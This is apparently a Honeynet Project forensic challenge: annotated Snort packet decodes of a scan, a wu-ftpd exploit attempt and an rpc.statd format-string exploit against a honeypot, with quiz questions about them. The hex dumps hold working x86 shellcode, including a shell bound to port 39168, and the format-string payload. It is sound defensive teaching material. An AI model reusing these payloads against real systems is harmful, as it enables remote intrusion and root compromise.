#
# SCAN OF THE MONTH #10: 10 December
#
# Contest to see who can determine which tool was used
# and the purpose of this scan. Packet decodes using snort
# (http://www.snort.org).
#
# The packets were captured from the wild as part of the
# Honeynet Project, http://project.honeynet.org
#

QUESTIONS:
----------
Below are two exploit attacks run against our Honeynet in the same day,
specifically the system 172.16.1.104, a Linux RH 6.2 honeypot (default
install). As you read through these signatures, the challenge is to
answer the following questions:

### QUESTION 1: Can you name the FTP scanning tool?
### QUESTION 2: What does this FTP exploit achieve? Does it open a port,
###             create a shell, add a user account?
### QUESTION 3: Is the FTP attack successful?
### QUESTION 4: What RPC service is exploited?
### QUESTION 5: Where in the exploit code below does he bind a shell to
###             port 39168?
### QUESTION 6: What two accounts are created, and what are the UID's?

THE SIGNATURES
--------------
### Bad guy starts off with a half open SYN scan of
### the network.
### QUESTION 1: Can you name the FTP scanning tool?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.019086 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:51721
**S***** Seq: 0x64   Ack: 0x0   Win: 0x200
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.025315 172.16.1.104:21 -> 207.219.207.240:10101
TCP TTL:63 TOS:0x0 ID:48209 DF
**S***A* Seq: 0x41C40069   Ack: 0x65   Win: 0x7FB8
TCP Options => MSS: 536
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:27:31.125575 207.219.207.240:10101 -> 172.16.1.104:21
TCP TTL:241 TOS:0x0 ID:65496
****R*** Seq: 0x65   Ack: 0x0   Win: 0x0

### Bad guy now completes a full TCP connect to the system.
### Notice how the IP and TCP header information has changed now that
### the OS and not the tool is building the packets. TTL has gone
### from 241 to a TTL of 50.
### Looks like this guy is 14 hops away.
### Notice how with the full connect, we have TCP Options and a Window
### size that indicate a Linux OS.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.825518 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13905 DF
**S***** Seq: 0xC331FCC5   Ack: 0x0   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 125865634 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.829397 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x0 ID:48210 DF
**S***A* Seq: 0xA03F7698   Ack: 0xC331FCC6   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105623688 125865634 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:36.931933 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:13911 DF
******A* Seq: 0xC331FCC6   Ack: 0xA03F7699   Win: 0x7D78
TCP Options => NOP NOP TS: 125865645 105623688
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.159740 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48215 DF
*****PA* Seq: 0xA03F7699   Ack: 0xC331FCC6   Win: 0x7D78
TCP Options => NOP NOP TS: 105624021 125865645
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72  220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D  ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62  2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54   28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A      2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.271630 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14254 DF
******A* Seq: 0xC331FCC6   Ack: 0xA03F76E8   Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021

### Bad guy got the FTP version information, so he closes the connection.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.272824 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:14256 DF
***F**A* Seq: 0xC331FCC6   Ack: 0xA03F76E8   Win: 0x7D78
TCP Options => NOP NOP TS: 125865980 105624021
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274083 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48216 DF
******A* Seq: 0xA03F76E8   Ack: 0xC331FCC7   Win: 0x7D78
TCP Options => NOP NOP TS: 105624032 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.274149 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48217 DF
*****PA* Seq: 0xA03F76E8   Ack: 0xC331FCC7   Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74  221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62   least say goodb
79 65 2E 0D 0A                                   ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.277315 172.16.1.104:21 -> 207.219.207.240:3464
TCP TTL:63 TOS:0x10 ID:48219 DF
***F**A* Seq: 0xA03F770D   Ack: 0xC331FCC7   Win: 0x7D78
TCP Options => NOP NOP TS: 105624033 125865980
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.375292 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14261
****R*** Seq: 0xC331FCC7   Ack: 0x0   Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-00:52:40.386029 207.219.207.240:3464 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:14265
****R*** Seq: 0xC331FCC7   Ack: 0x0   Win: 0x0

### Looks like the bad guy is now done with FTP. He now moves
### on to RPC. First a UDP connection. Notice the source port
### is less than 1024: the bad guy is root on the remote system.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.939896 207.219.207.240:629 -> 172.16.1.104:111
UDP TTL:50 TOS:0x0 ID:53460
Len: 64
70 01 C4 19 00 00 00 00 00 00 00 02 00 01 86 A0  p...............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 06 00 00 00 00                          ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:23.942134 172.16.1.104:111 -> 207.219.207.240:629
UDP TTL:63 TOS:0x0 ID:48220
Len: 36
70 01 C4 19 00 00 00 01 00 00 00 00 00 00 00 00  p...............
00 00 00 00 00 00 00 00 00 00 03 A5              ............

### The bad guy now makes a TCP connection to port 933. Most likely a probe
### for a vulnerable RPC service. However, a RST is returned,
### indicating no service is listening.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.046223 207.219.207.240:630 -> 172.16.1.104:933
TCP TTL:50 TOS:0x0 ID:53461 DF
**S***** Seq: 0x33CB6C6D   Ack: 0x0   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044347 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:24.047610 172.16.1.104:933 -> 207.219.207.240:630
TCP TTL:254 TOS:0x0 ID:48221
****R*A* Seq: 0x0   Ack: 0x33CB6C6E   Win: 0x0

### Bad guy again makes a full TCP connection to FTP. This
### time he is up to something.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.617232 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53471 DF
**S***** Seq: 0x33BC72A2   Ack: 0x0   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 126044705 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.618999 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x0 ID:48222 DF
**S***A* Seq: 0x110CE78A   Ack: 0x33BC72A3   Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 105802758 126044705 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:27.713070 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53472 DF
******A* Seq: 0x33BC72A3   Ack: 0x110CE78B   Win: 0x7D78
TCP Options => NOP NOP TS: 126044714 105802758
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:30.904850 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48227 DF
*****PA* Seq: 0x110CE78B   Ack: 0x33BC72A3   Win: 0x7D78
TCP Options => NOP NOP TS: 105803086 126044714
32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72  220 kyle FTP ser
76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D  ver (Version wu-
32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62  2.6.0(1) Mon Feb
20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54   28 10:30:36 EST
20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A      2000) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.017415 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53474 DF
******A* Seq: 0x33BC72A3   Ack: 0x110CE7DA   Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.018970 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53475 DF
*****PA* Seq: 0x33BC72A3   Ack: 0x110CE7DA   Win: 0x7D78
TCP Options => NOP NOP TS: 126045045 105803086
55 53 45 52 20 66 74 70 0D 0A                    USER ftp..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.020239 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48228 DF
******A* Seq: 0x110CE7DA   Ack: 0x33BC72AD   Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.025534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48230 DF
*****PA* Seq: 0x110CE7DA   Ack: 0x33BC72AD   Win: 0x7D78
TCP Options => NOP NOP TS: 105803098 126045045
33 33 31 20 47 75 65 73 74 20 6C 6F 67 69 6E 20  331 Guest login 
6F 6B 2C 20 73 65 6E 64 20 79 6F 75 72 20 63 6F  ok, send your co
6D 70 6C 65 74 65 20 65 2D 6D 61 69 6C 20 61 64  mplete e-mail ad
64 72 65 73 73 20 61 73 20 70 61 73 73 77 6F 72  dress as passwor
64 2E 0D 0A                                      d...

### Okay, looks like we have an attack against FTP here. But what?
### Snort detects the attack and sends the following alert.
### Dec 9 01:22:31 firewall snort[6511]: IDS287 - FTP - Wuftp260 venglin linux:
### 207.219.207.240:1882 -> 172.16.1.104:21
### This appears to be a format string and not a buffer overflow attack.
### QUESTION 2: What does this FTP exploit achieve? Does it open a port,
###             create a shell, add an account?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53476 DF
*****PA* Seq: 0x33BC72AD   Ack: 0x110CE81E   Win: 0x7D78
TCP Options => NOP NOP TS: 126045057 105803098
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90  PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD  .......1.1.1..F.
80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E  .1.1.C..A.?...k^
31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0  1.1..^..F.f.....
27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB  '..1..^..=..1.1.
8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0  .^..C.1...1..^..
0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0  .....u.1..F..^..
3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46  =.....0...F.1..F
07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0  ..v..F....N..V..
0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF  ...1.1..........
FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76  ...0bin0sh1..11v
65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61  englin@kocham.ka
73 69 65 2E 63 6F 6D 0D 0A                       sie.com..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48231 DF
*****PA* Seq: 0x110CE81E   Ack: 0x33BC7446   Win: 0x7D78
TCP Options => NOP NOP TS: 105803113 126045057
35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72  530 Login incorr
65 63 74 2E 0D 0A                                ect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:31.285312 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53477 DF
******A* Seq: 0x33BC7446   Ack: 0x110CE834   Win: 0x7D78
TCP Options => NOP NOP TS: 126045072 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.876754 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:50 TOS:0x0 ID:53479 DF
***F**A* Seq: 0x33BC7446   Ack: 0x110CE834   Win: 0x7D78
TCP Options => NOP NOP TS: 126045931 105803113
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878137 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48232 DF
******A* Seq: 0x110CE834   Ack: 0x33BC7447   Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48233 DF
*****PA* Seq: 0x110CE834   Ack: 0x33BC7447   Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74  221 You could at
20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62   least say goodb
79 65 2E 0D 0A                                   ye...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882
TCP TTL:63 TOS:0x10 ID:48234 DF
***F**A* Seq: 0x110CE859   Ack: 0x33BC7447   Win: 0x7D78
TCP Options => NOP NOP TS: 105803984 126045931
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.979538 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53481
****R*** Seq: 0x33BC7447   Ack: 0x0   Win: 0x0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-01:22:39.983316 207.219.207.240:1882 -> 172.16.1.104:21
TCP TTL:241 TOS:0x10 ID:53482
****R*** Seq: 0x33BC7447   Ack: 0x0   Win: 0x0

### The FTP attack is all done.
### QUESTION 3: Is the FTP attack successful?

### Six hours later a new attack.
### Is it the same person coming
### from a different IP address, or is this unrelated? The bad
### guy starts off with an RPC probe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.138117 207.19.5.25:709 -> 172.16.1.104:111
UDP TTL:49 TOS:0x0 ID:48624
Len: 64
2F 99 8C 57 00 00 00 00 00 00 00 02 00 01 86 A0  /..W............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.144426 172.16.1.104:111 -> 207.19.5.25:709
UDP TTL:63 TOS:0x0 ID:48239
Len: 36
2F 99 8C 57 00 00 00 01 00 00 00 00 00 00 00 00  /..W............
00 00 00 00 00 00 00 00 00 00 03 A3              ............

### He finds a vulnerability and immediately launches into an
### RPC exploit. This exploit appears to create a /bin/sh listening
### on port 39168. He immediately connects to this port after the
### exploit. Snort detected the attack and sent the following alert.
### Dec 9 07:17:10 firewall snort[6511]: IDS362 - MISC - Shellcode X86 NOPS-UDP:
### 207.19.5.25:710 -> 172.16.1.104:931
### QUESTION 4: What RPC service is exploited?
### QUESTION 5: Where in the exploit code below does he bind a shell
###             to port 39168?
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:10.595325 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48712
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8  .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ............... 
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73  :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF  ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31  x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78  37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90  %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/09-07:17:12.552539 207.19.5.25:710 -> 172.16.1.104:931
UDP TTL:49 TOS:0x0 ID:48941
Len: 1084
0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8  .rT.............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ............... 
3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73  :2?.....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF  ................
1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31  x%8x%8x%236x%n%1
33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78  37x%n%10x%n%192x
25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90  %n..............
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
